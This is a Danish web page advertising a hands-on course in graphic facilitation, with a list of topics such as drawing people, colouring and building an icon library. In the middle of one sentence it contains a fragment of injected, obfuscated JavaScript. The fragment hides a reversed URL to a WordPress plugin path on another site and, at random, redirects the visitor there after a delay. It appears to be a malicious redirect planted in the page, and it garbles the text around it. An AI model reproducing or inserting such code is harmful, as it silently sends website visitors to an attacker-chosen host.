Grafisk facilitering

Vil i lige indsætte noget her?

Grafisk facilitering er ikke en kunst. Det er et værktøj. Det handler faktisk ikke så meget om tegningen, men
om, hvordan det grafiske undervejs kan understøtte faciliteringen af meningsskabende processer.

Vi overdænges af teknologiske værktøjer og mange møder/undervisning ødelægges af endeløse
slideshows. Der er brug for letaflæselige og overskuelige kommunikationsformer.
Kort sagt: Der er brug for at ledere, konsulenter og andre som leder møder og/eller faciliterer processer kan
arbejde med grafisk facilitering som værktøj. Og det er et værktøj, som alle kan lære. Det skal netoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top ikke
udvikle sig til kunst.

Lad mig tilrettelægge og gennemføre et kursus målrettet jer. I kommer til at arbejde ’hands-on’ så I både
får viden og praktisk erfaring.

  •  Introduktion til Grafisk Facilitering – hvad og hvorfor?
  • Det tegnetekniske
  • Hvordan man meget enkelt kan tegne mennesker, bygninger, organisationer, talebobler.
  •  Farvelægning. Vi øver på at farvelægge og høre om principperne omkring det.
  • Skabeloner til brug ved møder, præsentationer m.m.
  • Egne ikoner, så I faktisk kan komme hjem med jeres eget ikonbibliotek!

Varighed: ½-3 dage – afhængig af jeres ønske og behov.